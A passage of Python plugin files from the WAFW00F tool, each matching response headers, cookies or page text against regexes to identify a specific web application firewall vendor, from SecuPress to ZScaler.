14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/secupress.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'SecuPress WP Security (SecuPress)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'<(title|h\d{1})>SecuPress'),
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/secureentry.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Secure Entry (United Security Providers)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', 'Secure Entry Server'))
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/secureiis.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'eEye SecureIIS (BeyondTrust)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'SecureIIS is an internet security application'),
13 |         self.matchContent(r'Download SecureIIS Personal Edition'),
14 |         self.matchContent(r'https?://www\.eeye\.com/Secure\-?IIS')
15 |     ]
16 |     if any(i for i in schemes):
17 |         return True
18 |     return False
19 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/securesphere.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'SecureSphere (Imperva Inc.)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'<(title|h2)>Error'),
13 |         self.matchContent(r'The incident ID is'),
14 |         self.matchContent(r"This page can't be displayed"),
15 |         self.matchContent(r'Contact support for additional information')
16 |     ]
17 |     if all(i for i in schemes):
18 |         return True
19 |     return False
20 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/senginx.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'SEnginx (Neusoft)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'SENGINX\-ROBOT\-MITIGATION')
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/serverdefender.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'ServerDefender VP (Port80 Software)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('X-Pint', r'p(ort\-)?80'))
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/shadowd.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Shadow Daemon (Zecure)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r"<h\d{1}>\d{3}.forbidden<.h\d{1}>"),
13 |         self.matchContent(r"request forbidden by administrative rules")
14 |     ]
15 |     if all(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/shieldsecurity.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Shield Security (One Dollar Plugin)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r"You were blocked by the Shield"),
13 |         self.matchContent(r"remaining transgression\(s\) against this site"),
14 |         self.matchContent(r"Something in the URL.{0,5}?Form or Cookie data wasn\'t appropriate")
15 |     ]
16 |     if any(i for i in schemes):
17 |         return True
18 |     return False
19 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/siteground.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'SiteGround (SiteGround)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r"Our system thinks you might be a robot!"),
13 |         self.matchContent(r'access is restricted due to a security rule')
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/siteguard.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'SiteGuard (Sakura Inc.)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r"Powered by SiteGuard"),
13 |         self.matchContent(r'The server refuse to browse the page')
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/sitelock.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Sitelock (TrueShield)'
 8 | 
 9 | 
10 | # Well this is confusing, Sitelock itself uses Incapsula from Imperva
11 | # So the fingerprints obtained on blockpage are similar to those of Incapsula.
12 | 
13 | def is_waf(self):
14 |     schemes = [
15 |         self.matchContent(r"SiteLock will remember you"),
16 |         self.matchContent(r"Sitelock is leader in Business Website Security Services"),
17 |         self.matchContent(r"sitelock[_\-]shield([_\-]logo|[\-_]badge)?"),
18 |         self.matchContent(r'SiteLock incident ID')
19 |     ]
20 |     if any(i for i in schemes):
21 |         return True
22 |     return False
23 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/sonicwall.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'SonicWall (Dell)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', 'SonicWALL')),
13 |         self.matchContent(r"<(title|h\d{1})>Web Site Blocked"),
14 |         self.matchContent(r'\+?nsa_banner')
15 |     ]
16 |     if any(i for i in schemes):
17 |         return True
18 |     return False
19 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/sophos.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'UTM Web Protection (Sophos)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schema1 = [
12 |         self.matchContent(r'www\.sophos\.com'),
13 |         self.matchContent(r'Powered by.?(Sophos)? UTM Web Protection')
14 |     ]
15 |     schema2 = [
16 |         self.matchContent(r'<title>Access to the requested URL was blocked'),
17 |         self.matchContent(r'Access to the requested URL was blocked'),
18 |         self.matchContent(r'incident was logged with the following log identifier'),
19 |         self.matchContent(r'Inbound Anomaly Score exceeded'),
20 |         self.matchContent(r'Your cache administrator is')
21 |     ]
22 |     if any(i for i in schema1):
23 |         return True
24 |     if all(i for i in schema2):
25 |         return True
26 |     return False
27 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/squarespace.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Squarespace (Squarespace)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', 'Squarespace')),
13 |         self.matchCookie(r'^SS_ANALYTICS_ID='),
14 |         self.matchCookie(r'^SS_MATTR='),
15 |         self.matchCookie(r'^SS_MID='),
16 |         self.matchCookie(r'SS_CVT='),
17 |         self.matchContent(r'status\.squarespace\.com'),
18 |         self.matchContent(r'BRICK\-\d{2}')
19 |     ]
20 |     if any(i for i in schemes):
21 |         return True
22 |     return False
23 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/squidproxy.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'SquidProxy IDS (SquidProxy)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', r'squid(/[0-9\.]+)?')),
13 |         self.matchContent(r'Access control configuration prevents your request')
14 |     ]
15 |     if all(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/stackpath.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'StackPath (StackPath)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r"This website is using a security service to protect itself"),
13 |         self.matchContent(r'You performed an action that triggered the service and blocked your request')
14 |     ]
15 |     if all(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/sucuri.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Sucuri CloudProxy (Sucuri Inc.)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('X-Sucuri-ID', r'.+?')),
13 |         self.matchHeader(('X-Sucuri-Cache', r'.+?')),
14 |         self.matchHeader(('Server', r'Sucuri(\-Cloudproxy)?')),
15 |         self.matchHeader(('X-Sucuri-Block', r'.+?'), attack=True),
16 |         self.matchContent(r"Access Denied.{0,6}?Sucuri Website Firewall"),
17 |         self.matchContent(r"<title>Sucuri WebSite Firewall.{0,6}?(CloudProxy)?.{0,6}?Access Denied"),
18 |         self.matchContent(r"sucuri\.net/privacy\-policy"),
19 |         self.matchContent(r"cdn\.sucuri\.net/sucuri[-_]firewall[-_]block\.css"),
20 |         self.matchContent(r'cloudproxy@sucuri\.net')
21 |     ]
22 |     if any(i for i in schemes):
23 |         return True
24 |     return False
25 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/tencent.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Tencent Cloud Firewall (Tencent Technologies)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'waf\.tencent\-?cloud\.com/')
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/teros.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Teros (Citrix Systems)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchCookie(r'^st8id=')
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/transip.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'TransIP Web Firewall (TransIP)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('X-TransIP-Backend', '.+')),
13 |         self.matchHeader(('X-TransIP-Balancer', '.+'))
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/uewaf.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'UEWaf (UCloud)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', r'uewaf(/[0-9\.]+)?')),
13 |         self.matchContent(r'/uewaf_deny_pages/default/img/'),
14 |         self.matchContent(r'ucloud\.cn')
15 |     ]
16 |     if any(i for i in schemes):
17 |         return True
18 |     return False
19 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/urlmaster.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'URLMaster SecurityCheck (iFinity/DotNetNuke)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schema1 = [
12 |         self.matchHeader(('X-UrlMaster-Debug', '.+')),
13 |         self.matchHeader(('X-UrlMaster-Ex', '.+')),
14 |     ]
15 |     schema2 = [
16 |         self.matchContent(r"Ur[li]RewriteModule"),
17 |         self.matchContent(r'SecurityCheck')
18 |     ]
19 |     if any(i for i in schema1):
20 |         return True
21 |     if all(i for i in schema2):
22 |         return True
23 |     return False
24 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/urlscan.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'URLScan (Microsoft)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r"Rejected[-_]By[_-]UrlScan"),
13 |         self.matchContent(r'A custom filter or module.{0,4}?such as URLScan')
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/varnish.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Varnish (OWASP)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'Request rejected by xVarnish\-WAF')
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/viettel.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Viettel (Cloudrity)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r"Access Denied.{0,10}?Viettel WAF"),
13 |         self.matchContent(r"cloudrity\.com\.(vn)?/"),
14 |         self.matchContent(r"Viettel WAF System")
15 |     ]
16 |     if any(i for i in schemes):
17 |         return True
18 |     return False
19 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/virusdie.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'VirusDie (VirusDie LLC)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r"cdn\.virusdie\.ru/splash/firewallstop\.png"),
13 |         self.matchContent(r'copy.{0,10}?Virusdie\.ru')
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/wallarm.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Wallarm (Wallarm Inc.)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', r'nginx[\-_]wallarm'))
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/watchguard.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'WatchGuard (WatchGuard Technologies)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', 'WatchGuard')),
13 |         self.matchContent(r"Request denied by WatchGuard Firewall"),
14 |         self.matchContent(r'WatchGuard Technologies Inc\.')
15 |     ]
16 |     if any(i for i in schemes):
17 |         return True
18 |     return False
19 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/webarx.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'WebARX (WebARX Security Solutions)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r"WebARX.{0,10}?Web Application Firewall"),
13 |         self.matchContent(r"www\.webarxsecurity\.com"),
14 |         self.matchContent(r'/wp\-content/plugins/webarx/includes/')
15 |     ]
16 |     if any(i for i in schemes):
17 |         return True
18 |     return False
19 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/webknight.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'WebKnight (AQTRONIX)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schema1 = [
12 |         self.matchStatus(999),
13 |         self.matchReason('No Hacking')
14 |     ]
15 |     schema2 = [
16 |         self.matchStatus(404),
17 |         self.matchReason('Hack Not Found')
18 |     ]
19 |     schema3 = [
20 |         self.matchContent(r'WebKnight Application Firewall Alert'),
21 |         self.matchContent(r'What is webknight\?'),
22 |         self.matchContent(r'AQTRONIX WebKnight is an application firewall'),
23 |         self.matchContent(r'WebKnight will take over and protect'),
24 |         self.matchContent(r'aqtronix\.com/WebKnight'),
25 |         self.matchContent(r'AQTRONIX.{0,10}?WebKnight'),
26 |     ]
27 |     if all(i for i in schema1):
28 |         return True
29 |     if all(i for i in schema2):
30 |         return True
31 |     if any(i for i in schema3):
32 |         return True
33 |     return False
34 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/webland.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'WebLand (WebLand)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', r'protected by webland'))
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/webray.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'RayWAF (WebRay Solutions)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', r'WebRay\-WAF')),
13 |         self.matchHeader(('DrivedBy', r'RaySrv.RayEng/[0-9\.]+?'))
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/webseal.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'WebSEAL (IBM)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', 'WebSEAL')),
13 |         self.matchContent(r"This is a WebSEAL error message template file"),
14 |         self.matchContent(r"WebSEAL server received an invalid HTTP request")
15 |     ]
16 |     if any(i for i in schemes):
17 |         return True
18 |     return False
19 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/webtotem.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'WebTotem (WebTotem)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r"The current request was blocked.{0,8}?>WebTotem")
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/west263cdn.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'West263 CDN (West263CDN)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('X-Cache', r'WS?T263CDN'))
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/wordfence.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Wordfence (Defiant)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', r'wf[_\-]?WAF')),
13 |         self.matchContent(r"Generated by Wordfence"),
14 |         self.matchContent(r'broke one of (the )?Wordfence (advanced )?blocking rules'),
15 |         self.matchContent(r"/plugins/wordfence")
16 |     ]
17 |     if any(i for i in schemes):
18 |         return True
19 |     return False
20 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/wts.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'WTS-WAF (WTS)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', r'wts/[0-9\.]+?')),
13 |         self.matchContent(r"<(title|h\d{1})>WTS\-WAF")
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/wzb360.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = '360WangZhanBao (360 Technologies)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', r'qianxin\-waf')),
13 |         self.matchHeader(('WZWS-Ray', r'.+?')),
14 |         self.matchHeader(('X-Powered-By-360WZB', r'.+?')),
15 |         self.matchContent(r'wzws\-waf\-cgi/'),
16 |         self.matchContent(r'wangshan\.360\.cn'),
17 |         self.matchStatus(493)
18 |     ]
19 |     if any(i for i in schemes):
20 |         return True
21 |     return False
22 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/xlabssecuritywaf.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'XLabs Security WAF (XLabs)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('X-CDN', r'XLabs Security')),
13 |         self.matchHeader(('Secured', r'^By XLabs Security')),
14 |         self.matchHeader(('Server', r'XLabs[-_]?.?WAF'), attack=True)
15 |     ]
16 |     if any(i for i in schemes):
17 |         return True
18 |     return False
19 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/xuanwudun.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Xuanwudun (Xuanwudun)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r"admin\.dbappwaf\.cn/(index\.php/Admin/ClientMisinform/)?"),
13 |         self.matchContent(r'class=.(db[\-_]?)?waf(.)?([\-_]?row)?>')
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/yundun.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Yundun (Yundun)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', 'YUNDUN')),
13 |         self.matchHeader(('X-Cache', 'YUNDUN')),
14 |         self.matchCookie(r'^yd_cookie='),
15 |         self.matchContent(r'Blocked by YUNDUN Cloud WAF'),
16 |         self.matchContent(r'yundun\.com/yd[-_]http[_-]error/'),
17 |         self.matchContent(r'www\.yundun\.com/(static/js/fingerprint\d{1}?\.js)?')
18 |     ]
19 |     if any(i for i in schemes):
20 |         return True
21 |     return False
22 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/yunsuo.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Yunsuo (Yunsuo)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchCookie(r'^yunsuo_session='),
13 |         self.matchContent(r'class=\"yunsuologo\"')
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/yxlink.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'YXLink (YxLink Technologies)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchCookie(r'^yx_ci_session='),
13 |         self.matchCookie(r'^yx_language='),
14 |         self.matchHeader(('Server', r'Yxlink([\-_]?WAF)?'))
15 |     ]
16 |     if any(i for i in schemes):
17 |         return True
18 |     return False
19 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/zenedge.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Zenedge (Zenedge)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', 'ZENEDGE')),
13 |         self.matchHeader(('X-Zen-Fury', r'.+?')),
14 |         self.matchContent(r'/__zenedge/')
15 |     ]
16 |     if any(i for i in schemes):
17 |         return True
18 |     return False
19 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/zscaler.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'ZScaler (Accenture)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', r'ZScaler')),
13 |         self.matchContent(r"Access Denied.{0,10}?Accenture Policy"),
14 |         self.matchContent(r'policies\.accenture\.com'),
15 |         self.matchContent(r'login\.zscloud\.net/img_logo_new1\.png'),
16 |         self.matchContent(r'Zscaler to protect you from internet threats'),
17 |         self.matchContent(r"Internet Security by ZScaler"),
18 |         self.matchContent(r"Accenture.{0,10}?webfilters indicate that the site likely contains")
19 |     ]
20 |     if any(i for i in schemes):
21 |         return True
22 |     return False
23 | 


--------------------------------------------------------------------------------
/wafw00f/wafprio.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | '''
  3 | Copyright (C) 2020, WAFW00F Developers.
  4 | See the LICENSE file for copying permission.
  5 | '''
  6 | 
